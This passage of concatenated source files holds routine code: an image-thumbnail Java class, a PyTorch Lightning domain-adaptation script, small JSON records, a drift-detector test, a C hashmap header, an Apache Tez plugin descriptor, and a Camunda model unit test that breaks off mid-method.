3) { g.drawImage(transformedImage, 0, 0, resizedImage.getWidth(), resizedImage.getHeight(), null); } else { g.drawImage(transformedImage, 0, 0, resizedImage.getWidth(), resizedImage.getHeight(), Color.BLACK, null); } g.dispose(); //Write the bufferedImage to a file. ImageIO.write(resizedImage, format, out); } catch (IOException e) { throw new LumifyResourceNotFoundException("Error reading inputstream"); } return new ArtifactThumbnail(out.toByteArray(), type, format); } public BufferedImage getTransformedImage(BufferedImage originalImage, Vertex artifactVertex) { int cwRotationNeeded = 0; if (clockwiseRotationProperty != null) { Integer nullable = clockwiseRotationProperty.getPropertyValue(artifactVertex); if (nullable != null) { cwRotationNeeded = nullable; } } boolean yAxisFlipNeeded = false; if (yAxisFlippedProperty != null) { Boolean nullable = yAxisFlippedProperty.getPropertyValue(artifactVertex); if (nullable != null) { yAxisFlipNeeded = nullable; } } //Rotate and flip image. return ImageUtils.reOrientImage(originalImage, yAxisFlipNeeded, cwRotationNeeded); } public int[] getScaledDimension(int[] imgSize, int[] boundary) { int originalWidth = imgSize[0]; int originalHeight = imgSize[1]; int boundWidth = boundary[0]; int boundHeight = boundary[1]; int newWidth = originalWidth; int newHeight = originalHeight; if (originalWidth > boundWidth) { newWidth = boundWidth; newHeight = (newWidth * originalHeight) / originalWidth; } if (newHeight > boundHeight) { newHeight = boundHeight; newWidth = (newHeight * originalWidth) / originalHeight; } return new int[]{newWidth, newHeight}; } }
2,429
324
<filename>examples/action_dann_lightn/main.py<gh_stars>100-1000 """This example is about domain adaptation for action recognition, using PyTorch Lightning. Reference: https://github.com/thuml/CDAN/blob/master/pytorch/train_image.py """ import argparse import logging import pytorch_lightning as pl from config import get_cfg_defaults from model import get_model from pytorch_lightning import loggers as pl_loggers from pytorch_lightning.callbacks import LearningRateMonitor, ModelCheckpoint, TQDMProgressBar from kale.loaddata.video_access import VideoDataset from kale.loaddata.video_multi_domain import VideoMultiDomainDatasets from kale.utils.seed import set_seed # from pytorch_lightning.callbacks.early_stopping import EarlyStopping def arg_parse(): """Parsing arguments""" parser = argparse.ArgumentParser(description="Domain Adversarial Networks on Action Datasets") parser.add_argument("--cfg", required=True, help="path to config file", type=str) parser.add_argument( "--gpus", default=1, help="gpu id(s) to use. None/int(0) for cpu. list[x,y] for xth, yth GPU." "str(x) for the first x GPUs. str(-1)/int(-1) for all available GPUs", ) parser.add_argument("--resume", default="", type=str) args = parser.parse_args() return args def main(): """The main for this domain adaptation example, showing the workflow""" args = arg_parse() # ---- setup configs ---- cfg = get_cfg_defaults() cfg.merge_from_file(args.cfg) cfg.freeze() print(cfg) # ---- setup output ---- format_str = "@%(asctime)s %(name)s [%(levelname)s] - (%(message)s)" logging.basicConfig(format=format_str) # ---- setup dataset ---- seed = cfg.SOLVER.SEED source, target, num_classes = VideoDataset.get_source_target( VideoDataset(cfg.DATASET.SOURCE.upper()), VideoDataset(cfg.DATASET.TARGET.upper()), seed, cfg ) dataset = VideoMultiDomainDatasets( source, target, image_modality=cfg.DATASET.IMAGE_MODALITY, seed=seed, config_weight_type=cfg.DATASET.WEIGHT_TYPE, config_size_type=cfg.DATASET.SIZE_TYPE, ) # ---- training/test process ---- ### Repeat multiple times to get std for i in range(0, cfg.DATASET.NUM_REPEAT): seed = seed + i * 10 set_seed(seed) # seed_everything in pytorch_lightning did not set torch.backends.cudnn print(f"==> Building model for seed {seed} ......") # ---- setup model and logger ---- model, train_params = get_model(cfg, dataset, num_classes) tb_logger = pl_loggers.TensorBoardLogger(cfg.OUTPUT.TB_DIR, name="seed{}".format(seed)) checkpoint_callback = ModelCheckpoint( # dirpath=full_checkpoint_dir, filename="{epoch}-{step}-{val_loss:.4f}", # save_last=True, # save_top_k=1, monitor="val_loss", mode="min", ) ### Set early stopping # early_stop_callback = EarlyStopping(monitor="val_target_acc", min_delta=0.0000, patience=100, mode="max") lr_monitor = LearningRateMonitor(logging_interval="epoch") progress_bar = TQDMProgressBar(cfg.OUTPUT.PB_FRESH) ### Set the lightning trainer. Comment `limit_train_batches`, `limit_val_batches`, `limit_test_batches` when # training. Uncomment and change the ratio to test the code on the smallest sub-dataset for efficiency in # debugging. Uncomment early_stop_callback to activate early stopping. trainer = pl.Trainer( min_epochs=cfg.SOLVER.MIN_EPOCHS, max_epochs=cfg.SOLVER.MAX_EPOCHS, # resume_from_checkpoint=last_checkpoint_file, gpus=args.gpus, logger=tb_logger, # logger, # weights_summary='full', fast_dev_run=cfg.OUTPUT.FAST_DEV_RUN, # True, callbacks=[lr_monitor, checkpoint_callback, progress_bar], # callbacks=[early_stop_callback, lr_monitor], # limit_train_batches=0.005, # limit_val_batches=0.06, # limit_test_batches=0.06, ) ### Find learning_rate # lr_finder = trainer.tuner.lr_find(model, max_lr=0.1, min_lr=1e-6) # fig = lr_finder.plot(suggest=True) # fig.show() # logging.info(lr_finder.suggestion()) ### Training/validation process trainer.fit(model) ### Test process trainer.test() if __name__ == "__main__": main()
1,910
310
<gh_stars>100-1000 { "name": "Kuler", "description": "A web service for generating colour palettes.", "url": "https://en.wikipedia.org/wiki/Adobe_Kuler" }
58
348
{"nom":"Saint-Caprais-de-Lerm","circ":"1ère circonscription","dpt":"Lot-et-Garonne","inscrits":516,"abs":268,"votants":248,"blancs":27,"nuls":13,"exp":208,"res":[{"nuance":"REM","nom":"M. <NAME>","voix":107},{"nuance":"UDI","nom":"<NAME>","voix":101}]}
102
1,227
import numpy as np import pytest from alibi_detect.cd import MMDDrift from alibi_detect.cd.pytorch.mmd import MMDDriftTorch from alibi_detect.cd.tensorflow.mmd import MMDDriftTF n, n_features = 100, 5 tests_mmddrift = ['tensorflow', 'pytorch', 'PyToRcH', 'mxnet'] n_tests = len(tests_mmddrift) @pytest.fixture def mmddrift_params(request): return tests_mmddrift[request.param] @pytest.mark.parametrize('mmddrift_params', list(range(n_tests)), indirect=True) def test_mmddrift(mmddrift_params): backend = mmddrift_params x_ref = np.random.randn(*(n, n_features)) try: cd = MMDDrift(x_ref=x_ref, backend=backend) except NotImplementedError: cd = None if backend.lower() == 'pytorch': assert isinstance(cd._detector, MMDDriftTorch) elif backend.lower() == 'tensorflow': assert isinstance(cd._detector, MMDDriftTF) else: assert cd is None
385
310
<filename>gear/hardware/w/workforce-545.json { "name": "WorkForce 545", "description": "An all-in-one printer, copier, scanner, and fax.", "url": "https://www.amazon.com/Epson-WorkForce-Smartphone-Compatible-C11CB88201/dp/B005IVL0ZK" }
95
778
//--------------------------------------------------------------------------------------------------------------------// // // // Tuplex: Blazing Fast Python Data Science // // // // // // (c) 2017 - 2021, Tuplex team // // Created by <NAME> on 1/1/2021 // // License: Apache 2.0 // //--------------------------------------------------------------------------------------------------------------------// #ifndef __INT_HASHMAP_H__ #define __INT_HASHMAP_H__ // C guard #ifdef __cplusplus extern "C" { #endif #include <cstdint> #include <cstdlib> #define MAP_MISSING -3 /* No such element */ #define MAP_FULL -2 /* Hashmap is full */ #define MAP_OMEM -1 /* Out of Memory */ #define MAP_OK 0 /* OK */ /* * int64_any_t is a pointer. This allows you to put arbitrary structures in * the hashmap. */ typedef void *int64_any_t; // TODO: probably pull this out to a common header for both hashtables /* We need to keep keys and values */ typedef struct _int_hashmap_element { uint64_t key; int in_use; int64_any_t data; } int64_hashmap_element; /* * PFany is a pointer to a function that can take two int64_any_t arguments * and return an integer. Returns status code.. */ typedef int (*PFintany)(int64_any_t, int64_hashmap_element*); /* * map_t is a pointer to an internally maintained data structure. * Clients of this package do not need to know how hashmaps are * represented. They see and manipulate only map_t's. */ typedef int64_any_t map_t; /* * Return an empty hashmap. Returns NULL if empty. */ extern map_t int64_hashmap_new() __attribute__((used)); /* * Iteratively call f with argument (item, data) for * each element data in the hashmap. The function must * return a map status code. If it returns anything other * than MAP_OK the traversal is terminated. f must * not reenter any hashmap functions, or deadlock may arise. */ extern int int64_hashmap_iterate(map_t in, PFintany f, int64_any_t item) __attribute__((used)); /*! * calls free(...) on both key and data. Should be followed by hashmap_free call * @param in hashmap * @return MAP_OK */ extern int int64_hashmap_free_key_and_data(map_t in) __attribute__((used)); /* * Add an element to the hashmap. Return MAP_OK or MAP_OMEM. */ extern int int64_hashmap_put(map_t in, uint64_t key, int64_any_t value) __attribute__((used)); /* * put into hashmap, avoid strlen call */ extern int int64_hashmap_fastput(map_t in, uint64_t key, int64_any_t value) __attribute__((used)); /* * Get an element from the hashmap. Return MAP_OK or MAP_MISSING. */ extern int int64_hashmap_get(map_t in, uint64_t key, int64_any_t *arg) __attribute__((used)); /* * Remove an element from the hashmap. Return MAP_OK or MAP_MISSING. */ extern int int64_hashmap_remove(map_t in, uint64_t key) __attribute__((used)); /* * Get any element. Return MAP_OK or MAP_MISSING. * remove - should the element be removed from the hashmap */ extern int int64_hashmap_get_one(map_t in, int64_any_t *arg, int remove) __attribute__((used)); /* * Free the hashmap */ extern void int64_hashmap_free(map_t in) __attribute__((used)); /* * Get the current size of a hashmap */ extern int int64_hashmap_length(map_t in) __attribute__((used)); /*! * return how many buckets are used * @param in * @return how many buckets are used */ extern std::size_t int64_hashmap_bucket_count(map_t in) __attribute__((used)); extern unsigned long int64_hashmap_hash(uint64_t key); typedef int int64_hashmap_iterator_t; extern bool int64_hashmap_get_next_key(map_t in, int64_hashmap_iterator_t *it, uint64_t *key) __attribute__((used)); // C guard #ifdef __cplusplus } #endif #endif
1,885
384
/* * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.tez.serviceplugins.api; import java.util.Arrays; import org.apache.tez.common.Preconditions; import org.apache.hadoop.classification.InterfaceAudience; import org.apache.hadoop.classification.InterfaceStability; import org.apache.tez.dag.api.TezConfiguration; /** * An {@link ServicePluginsDescriptor} describes the list of plugins running within the AM for * sourcing resources, launching and executing work. */ @InterfaceAudience.Public @InterfaceStability.Unstable public class ServicePluginsDescriptor { private final boolean enableContainers; private final boolean enableUber; private TaskSchedulerDescriptor[] taskSchedulerDescriptors; private ContainerLauncherDescriptor[] containerLauncherDescriptors; private TaskCommunicatorDescriptor[] taskCommunicatorDescriptors; private ServicePluginsDescriptor(boolean enableContainers, boolean enableUber, TaskSchedulerDescriptor[] taskSchedulerDescriptors, ContainerLauncherDescriptor[] containerLauncherDescriptors, TaskCommunicatorDescriptor[] taskCommunicatorDescriptors) { this.enableContainers = enableContainers; this.enableUber = enableUber; Preconditions.checkArgument(taskSchedulerDescriptors == null || taskSchedulerDescriptors.length > 0, "TaskSchedulerDescriptors should either not be specified or at least 1 should be provided"); this.taskSchedulerDescriptors = taskSchedulerDescriptors; Preconditions.checkArgument(containerLauncherDescriptors == null || containerLauncherDescriptors.length > 0, "ContainerLauncherDescriptor should either not be specified or at least 1 should be provided"); this.containerLauncherDescriptors = containerLauncherDescriptors; Preconditions.checkArgument(taskCommunicatorDescriptors == null || taskCommunicatorDescriptors.length > 0, "TaskCommunicatorDescriptors should either not be specified or at least 1 should be provided"); this.taskCommunicatorDescriptors = taskCommunicatorDescriptors; } /** * Create a service plugin descriptor with the provided plugins. Regular containers will also be enabled * when using this method. * * @param taskSchedulerDescriptor the task scheduler plugin descriptors * @param containerLauncherDescriptors the container launcher plugin descriptors * @param taskCommunicatorDescriptors the task communicator plugin descriptors * @return a {@link ServicePluginsDescriptor} instance */ public static ServicePluginsDescriptor create(TaskSchedulerDescriptor[] taskSchedulerDescriptor, ContainerLauncherDescriptor[] containerLauncherDescriptors, TaskCommunicatorDescriptor[] taskCommunicatorDescriptors) { return new ServicePluginsDescriptor(true, false, taskSchedulerDescriptor, containerLauncherDescriptors, taskCommunicatorDescriptors); } /** * Create a service plugin descriptor with the provided plugins. Also allows specification of whether * in-AM execution is enabled. Container execution is enabled by default. * * Note on Uber mode: This is NOT fully supported at the moment. Tasks will be launched within the * AM process itself, controlled by {@link TezConfiguration#TEZ_AM_INLINE_TASK_EXECUTION_MAX_TASKS}. * The AM will need to be sized correctly for the tasks. Memory allocation to the running task * cannot be controlled yet, and is the full AM heap for each task. * TODO: TEZ-2722 * * @param enableUber whether to enable execution in the AM or not * @param taskSchedulerDescriptor the task scheduler plugin descriptors * @param containerLauncherDescriptors the container launcher plugin descriptors * @param taskCommunicatorDescriptors the task communicator plugin descriptors * @return a {@link ServicePluginsDescriptor} instance */ public static ServicePluginsDescriptor create(boolean enableUber, TaskSchedulerDescriptor[] taskSchedulerDescriptor, ContainerLauncherDescriptor[] containerLauncherDescriptors, TaskCommunicatorDescriptor[] taskCommunicatorDescriptors) { return new ServicePluginsDescriptor(true, enableUber, taskSchedulerDescriptor, containerLauncherDescriptors, taskCommunicatorDescriptors); } /** * Create a service plugin descriptor with the provided plugins. Also allows specification of whether * container execution and in-AM execution will be enabled. * * Note on Uber mode: This is NOT fully supported at the moment. Tasks will be launched within the * AM process itself, controlled by {@link TezConfiguration#TEZ_AM_INLINE_TASK_EXECUTION_MAX_TASKS}. * The AM will need to be sized correctly for the tasks. Memory allocation to the running task * cannot be controlled yet, and is the full AM heap for each task. * TODO: TEZ-2722 * * @param enableContainers whether to enable execution in containers * @param enableUber whether to enable execution in the AM or not * @param taskSchedulerDescriptor the task scheduler plugin descriptors * @param containerLauncherDescriptors the container launcher plugin descriptors * @param taskCommunicatorDescriptors the task communicator plugin descriptors * @return a {@link ServicePluginsDescriptor} instance */ public static ServicePluginsDescriptor create(boolean enableContainers, boolean enableUber, TaskSchedulerDescriptor[] taskSchedulerDescriptor, ContainerLauncherDescriptor[] containerLauncherDescriptors, TaskCommunicatorDescriptor[] taskCommunicatorDescriptors) { return new ServicePluginsDescriptor(enableContainers, enableUber, taskSchedulerDescriptor, containerLauncherDescriptors, taskCommunicatorDescriptors); } /** * Create a service plugin descriptor which may have in-AM execution of tasks enabled. Container * execution is enabled by default * * Note on Uber mode: This is NOT fully supported at the moment. Tasks will be launched within the * AM process itself, controlled by {@link TezConfiguration#TEZ_AM_INLINE_TASK_EXECUTION_MAX_TASKS}. * The AM will need to be sized correctly for the tasks. Memory allocation to the running task * cannot be controlled yet, and is the full AM heap for each task. * TODO: TEZ-2722 * * @param enableUber whether to enable execution in the AM or not * @return a {@link ServicePluginsDescriptor} instance */ public static ServicePluginsDescriptor create(boolean enableUber) { return new ServicePluginsDescriptor(true, enableUber, null, null, null); } @InterfaceAudience.Private public boolean areContainersEnabled() { return enableContainers; } @InterfaceAudience.Private public boolean isUberEnabled() { return enableUber; } @InterfaceAudience.Private public TaskSchedulerDescriptor[] getTaskSchedulerDescriptors() { return taskSchedulerDescriptors; } @InterfaceAudience.Private public ContainerLauncherDescriptor[] getContainerLauncherDescriptors() { return containerLauncherDescriptors; } @InterfaceAudience.Private public TaskCommunicatorDescriptor[] getTaskCommunicatorDescriptors() { return taskCommunicatorDescriptors; } @Override public String toString() { return "ServicePluginsDescriptor{" + "enableContainers=" + enableContainers + ", enableUber=" + enableUber + ", taskSchedulerDescriptors=" + Arrays.toString(taskSchedulerDescriptors) + ", containerLauncherDescriptors=" + Arrays.toString(containerLauncherDescriptors) + ", taskCommunicatorDescriptors=" + Arrays.toString(taskCommunicatorDescriptors) + '}'; } }
2,788
2,577
<gh_stars>1000+ /* * Copyright Camunda Services GmbH and/or licensed to Camunda Services GmbH * under one or more contributor license agreements. See the NOTICE file * distributed with this work for additional information regarding copyright * ownership. Camunda licenses this file to you under the Apache License, * Version 2.0; you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.camunda.bpm.model.xml.testmodel.instance; import static org.assertj.core.api.Assertions.assertThat; import static org.camunda.bpm.model.xml.testmodel.TestModelConstants.MODEL_NAMESPACE; import static org.junit.Assert.fail; import java.util.ArrayList; import java.util.Arrays; import java.util.Collection; import java.util.List; import org.camunda.bpm.model.xml.ModelInstance; import org.camunda.bpm.model.xml.ModelValidationException; import org.camunda.bpm.model.xml.impl.parser.AbstractModelParser; import org.camunda.bpm.model.xml.testmodel.Gender; import org.camunda.bpm.model.xml.testmodel.TestModelParser; import org.camunda.bpm.model.xml.testmodel.TestModelTest; import org.junit.Before; import org.junit.Test; import org.junit.runners.Parameterized.Parameters; /** * @author <NAME> */ public class AnimalTest extends TestModelTest { private Animal tweety; private Animal hedwig; private Animal birdo; private Animal plucky; private Animal fiffy; private Animal timmy; private Animal daisy; private RelationshipDefinition hedwigRelationship; private RelationshipDefinition birdoRelationship; private RelationshipDefinition pluckyRelationship; private RelationshipDefinition fiffyRelationship; private RelationshipDefinition timmyRelationship; private RelationshipDefinition daisyRelationship; public AnimalTest(String testName, ModelInstance testModelInstance, AbstractModelParser modelParser) { super(testName, testModelInstance, modelParser); } @Parameters(name="Model {0}") public static Collection<Object[]> models() { Object[][] models = {createModel(), parseModel(AnimalTest.class)}; return Arrays.asList(models); } public static Object[] createModel() { TestModelParser modelParser = new TestModelParser(); ModelInstance modelInstance = modelParser.getEmptyModel(); Animals animals = modelInstance.newInstance(Animals.class); modelInstance.setDocumentElement(animals); // add a tns namespace prefix for QName testing animals.getDomElement().registerNamespace("tns", MODEL_NAMESPACE); Animal tweety = createBird(modelInstance, "tweety", Gender.Female); Animal hedwig = createBird(modelInstance, "hedwig", Gender.Male); Animal birdo = createBird(modelInstance, "birdo", Gender.Female); Animal plucky = createBird(modelInstance, "plucky", Gender.Unknown); Animal fiffy = createBird(modelInstance, "fiffy", Gender.Female); createBird(modelInstance, "timmy", Gender.Male); createBird(modelInstance, "daisy", Gender.Female); // create and add some relationships RelationshipDefinition hedwigRelationship = createRelationshipDefinition(modelInstance, hedwig, ChildRelationshipDefinition.class); addRelationshipDefinition(tweety, hedwigRelationship); RelationshipDefinition birdoRelationship = createRelationshipDefinition(modelInstance, birdo, ChildRelationshipDefinition.class); addRelationshipDefinition(tweety, birdoRelationship); RelationshipDefinition pluckyRelationship = createRelationshipDefinition(modelInstance, plucky, FriendRelationshipDefinition.class); addRelationshipDefinition(tweety, pluckyRelationship); RelationshipDefinition fiffyRelationship = createRelationshipDefinition(modelInstance, fiffy, FriendRelationshipDefinition.class); addRelationshipDefinition(tweety, fiffyRelationship); tweety.getRelationshipDefinitionRefs().add(hedwigRelationship); tweety.getRelationshipDefinitionRefs().add(birdoRelationship); tweety.getRelationshipDefinitionRefs().add(pluckyRelationship); tweety.getRelationshipDefinitionRefs().add(fiffyRelationship); tweety.getBestFriends().add(birdo); tweety.getBestFriends().add(plucky); return new Object[]{"created", modelInstance, modelParser}; } @Before public void copyModelInstance() { modelInstance = cloneModelInstance(); tweety = modelInstance.getModelElementById("tweety"); hedwig = modelInstance.getModelElementById("hedwig"); birdo = modelInstance.getModelElementById("birdo"); plucky = modelInstance.getModelElementById("plucky"); fiffy = modelInstance.getModelElementById("fiffy"); timmy = modelInstance.getModelElementById("timmy"); daisy = modelInstance.getModelElementById("daisy"); hedwigRelationship = modelInstance.getModelElementById("tweety-hedwig"); birdoRelationship = modelInstance.getModelElementById("tweety-birdo"); pluckyRelationship = modelInstance.getModelElementById("tweety-plucky"); fiffyRelationship = modelInstance.getModelElementById("tweety-fiffy"); timmyRelationship = createRelationshipDefinition(modelInstance, timmy, FriendRelationshipDefinition.class); daisyRelationship = createRelationshipDefinition(modelInstance, daisy, ChildRelationshipDefinition.class); } @Test public void testSetIdAttributeByHelper() { String newId = "new-" + tweety.getId(); tweety.setId(newId); assertThat(tweety.getId()).isEqualTo(newId); } @Test public void testSetIdAttributeByAttributeName() { tweety.setAttributeValue("id", "duffy", true); assertThat(tweety.getId()).isEqualTo("duffy"); } @Test public void testRemoveIdAttribute() { tweety.removeAttribute("id"); assertThat(tweety.getId()).isNull(); } @Test public void testSetNameAttributeByHelper() { tweety.setName("tweety"); assertThat(tweety.getName()).isEqualTo("tweety"); } @Test public void testSetNameAttributeByAttributeName() { tweety.setAttributeValue("name", "daisy"); assertThat(tweety.getName()).isEqualTo("daisy"); } @Test public void testRemoveNameAttribute() { tweety.removeAttribute("name"); assertThat(tweety.getName()).isNull(); } @Test public void testSetFatherAttributeByHelper() { tweety.setFather(timmy); assertThat(tweety.getFather()).isEqualTo(timmy); } @Test public void testSetFatherAttributeByAttributeName() { tweety.setAttributeValue("father", timmy.getId()); assertThat(tweety.getFather()).isEqualTo(timmy); } @Test public void testSetFatherAttributeByAttributeNameWithNamespace() { tweety.setAttributeValue("father", "tns:hedwig"); assertThat(tweety.getFather()).isEqualTo(hedwig); } @Test public void testRemoveFatherAttribute() { tweety.setFather(timmy); assertThat(tweety.getFather()).isEqualTo(timmy); tweety.removeAttribute("father"); assertThat(tweety.getFather()).isNull(); } @Test public void testChangeIdAttributeOfFatherReference() { tweety.setFather(timmy); assertThat(tweety.getFather()).isEqualTo(timmy); timmy.setId("new-" + timmy.getId()); assertThat(tweety.getFather()).isEqualTo(timmy); } @Test public void testReplaceFatherReferenceWithNewAnimal() { tweety.setFather(timmy); assertThat(tweety.getFather()).isEqualTo(timmy); timmy.replaceWithElement(plucky); assertThat(tweety.getFather()).isEqualTo(plucky); } @Test public void testSetMotherAttributeByHelper() { tweety.setMother(daisy); assertThat(tweety.getMother()).isEqualTo(daisy); } @Test public void testSetMotherAttributeByAttributeName() { tweety.setAttributeValue("mother", fiffy.getId()); assertThat(tweety.getMother()).isEqualTo(fiffy); } @Test public void testRemoveMotherAttribute() { tweety.setMother(daisy); assertThat(tweety.getMother()).isEqualTo(daisy); tweety.removeAttribute("mother"); assertThat(tweety.getMother()).isNull(); } @Test public void testReplaceMotherReferenceWithNewAnimal() { tweety.setMother(daisy); assertThat(tweety.getMother()).isEqualTo(daisy); daisy.replaceWithElement(birdo); assertThat(tweety.getMother()).isEqualTo(birdo); } @Test public void testChangeIdAttributeOfMotherReference() { tweety.setMother(daisy); assertThat(tweety.getMother()).isEqualTo(daisy); daisy.setId("new-" + daisy.getId()); assertThat(tweety.getMother()).isEqualTo(daisy); } @Test public void testSetIsEndangeredAttributeByHelper() { tweety.setIsEndangered(true); assertThat(tweety.isEndangered()).isTrue(); } @Test public void testSetIsEndangeredAttributeByAttributeName() { tweety.setAttributeValue("isEndangered", "false"); assertThat(tweety.isEndangered()).isFalse(); } @Test public void testRemoveIsEndangeredAttribute() { tweety.removeAttribute("isEndangered"); // default value of isEndangered: false assertThat(tweety.isEndangered()).isFalse(); } @Test public void testSetGenderAttributeByHelper() { tweety.setGender(Gender.Male); assertThat(tweety.getGender()).isEqualTo(Gender.Male); } @Test public void testSetGenderAttributeByAttributeName() { tweety.setAttributeValue("gender", Gender.Unknown.toString()); assertThat(tweety.getGender()).isEqualTo(Gender.Unknown); } @Test public void testRemoveGenderAttribute() { tweety.removeAttribute("gender"); assertThat(tweety.getGender()).isNull(); // gender is required, so the model is invalid without try { validateModel(); fail("The model is invalid cause the gender of an animal is a required attribute."); } catch (Exception e) { assertThat(e).isInstanceOf(ModelValidationException.class); } // add gender to make model valid tweety.setGender(Gender.Female); } @Test public void testSetAgeAttributeByHelper() { tweety.setAge(13); assertThat(tweety.getAge()).isEqualTo(13); } @Test public void testSetAgeAttributeByAttributeName() { tweety.setAttributeValue("age", "23"); assertThat(tweety.getAge()).isEqualTo(23); } @Test public void testRemoveAgeAttribute() { tweety.removeAttribute("age"); assertThat(tweety.getAge()).isNull(); } @Test public void testAddRelationshipDefinitionsByHelper() { assertThat(tweety.getRelationshipDefinitions()) .isNotEmpty() .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); tweety.getRelationshipDefinitions().add(timmyRelationship); tweety.getRelationshipDefinitions().add(daisyRelationship); assertThat(tweety.getRelationshipDefinitions()) .hasSize(6) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionsByIdByHelper() { hedwigRelationship.setId("new-" + hedwigRelationship.getId()); pluckyRelationship.setId("new-" + pluckyRelationship.getId()); assertThat(tweety.getRelationshipDefinitions()) .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); } @Test public void testUpdateRelationshipDefinitionsByIdByAttributeName() { birdoRelationship.setAttributeValue("id", "new-" + birdoRelationship.getId(), true); fiffyRelationship.setAttributeValue("id", "new-" + fiffyRelationship.getId(), true); assertThat(tweety.getRelationshipDefinitions()) .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); } @Test public void testUpdateRelationshipDefinitionsByReplaceElements() { hedwigRelationship.replaceWithElement(timmyRelationship); pluckyRelationship.replaceWithElement(daisyRelationship); assertThat(tweety.getRelationshipDefinitions()) .hasSize(4) .containsOnly(birdoRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionsByRemoveElements() { tweety.getRelationshipDefinitions().remove(birdoRelationship); tweety.getRelationshipDefinitions().remove(fiffyRelationship); assertThat(tweety.getRelationshipDefinitions()) .hasSize(2) .containsOnly(hedwigRelationship, pluckyRelationship); } @Test public void testClearRelationshipDefinitions() { tweety.getRelationshipDefinitions().clear(); assertThat(tweety.getRelationshipDefinitions()).isEmpty(); } @Test public void testAddRelationsDefinitionRefsByHelper() { assertThat(tweety.getRelationshipDefinitionRefs()) .isNotEmpty() .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); addRelationshipDefinition(tweety, timmyRelationship); addRelationshipDefinition(tweety, daisyRelationship); tweety.getRelationshipDefinitionRefs().add(timmyRelationship); tweety.getRelationshipDefinitionRefs().add(daisyRelationship); assertThat(tweety.getRelationshipDefinitionRefs()) .isNotEmpty() .hasSize(6) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionRefsByIdByHelper() { hedwigRelationship.setId("child-relationship"); pluckyRelationship.setId("friend-relationship"); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); } @Test public void testUpdateRelationshipDefinitionRefsByIdByAttributeName() { birdoRelationship.setAttributeValue("id", "birdo-relationship", true); fiffyRelationship.setAttributeValue("id", "fiffy-relationship", true); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(4) .containsOnly(hedwigRelationship, birdoRelationship, pluckyRelationship, fiffyRelationship); } @Test public void testUpdateRelationshipDefinitionRefsByReplaceElements() { hedwigRelationship.replaceWithElement(timmyRelationship); pluckyRelationship.replaceWithElement(daisyRelationship); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(4) .containsOnly(birdoRelationship, fiffyRelationship, timmyRelationship, daisyRelationship); } @Test public void testUpdateRelationshipDefinitionRefsByRemoveElements() { tweety.getRelationshipDefinitions().remove(birdoRelationship); tweety.getRelationshipDefinitions().remove(fiffyRelationship); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(2) .containsOnly(hedwigRelationship, pluckyRelationship); } @Test public void testUpdateRelationshipDefinitionRefsByRemoveIdAttribute() { birdoRelationship.removeAttribute("id"); pluckyRelationship.removeAttribute("id"); assertThat(tweety.getRelationshipDefinitionRefs()) .hasSize(2) .containsOnly(hedwigRelationship, fiffyRelationship); } @Test public void testClearRelationshipDefinitionsRefs() { tweety.getRelationshipDefinitionRefs().clear(); assertThat(tweety.getRelationshipDefinitionRefs()).isEmpty(); // should not affect animal relationship definitions assertThat(tweety.getRelationshipDefinitions()).hasSize(4); } @Test public void testClearRelationshipDefinitionRefsByClearRelationshipDefinitions() { assertThat(tweety.getRelationshipDefinitionRefs()).isNotEmpty(); tweety.getRelationshipDefinitions().clear(); assertThat(tweety.getRelationshipDefinitions()).isEmpty(); // should affect animal relationship definition refs assertThat(tweety.getRelationshipDefinitionRefs()).isEmpty(); } @Test public void testAddRelationshipDefinitionRefElementsByHelper() { assertThat(tweety.getRelationshipDefinitionRefElements()) .isNotEmpty() .hasSize(4); addRelationshipDefinition(tweety, timmyRelationship); RelationshipDefinitionRef timmyRelationshipDefinitionRef = modelInstance.newInstance(RelationshipDefinitionRef.class); timmyRelationshipDefinitionRef.setTextContent(timmyRelationship.getId()); tweety.getRelationshipDefinitionRefElements().add(timmyRelationshipDefinitionRef); addRelationshipDefinition(tweety, daisyRelationship); RelationshipDefinitionRef daisyRelationshipDefinitionRef = modelInstance.newInstance(RelationshipDefinitionRef.class); daisyRelationshipDefinitionRef.setTextContent(daisyRelationship.getId()); tweety.getRelationshipDefinitionRefElements().add(daisyRelationshipDefinitionRef); assertThat(tweety.getRelationshipDefinitionRefElements()) .isNotEmpty() .hasSize(6) .contains(timmyRelationshipDefinitionRef, daisyRelationshipDefinitionRef); } @Test public void testRelationshipDefinitionRefElementsByTextContent() { Collection<RelationshipDefinitionRef> relationshipDefinitionRefElements = tweety.getRelationshipDefinitionRefElements(); Collection<String> textContents = new ArrayList<String>(); for (RelationshipDefinitionRef relationshipDefinitionRef : relationshipDefinitionRefElements) { String textContent = relationshipDefinitionRef.getTextContent(); assertThat(textContent).isNotEmpty(); textContents.add(textContent); } assertThat(textContents) .isNotEmpty() .hasSize(4) .containsOnly(hedwigRelationship.getId(), birdoRelationship.getId(), pluckyRelationship.getId(), fiffyRelationship.getId()); } @Test public void testUpdateRelationshipDefinitionRefElementsByTextContent() { 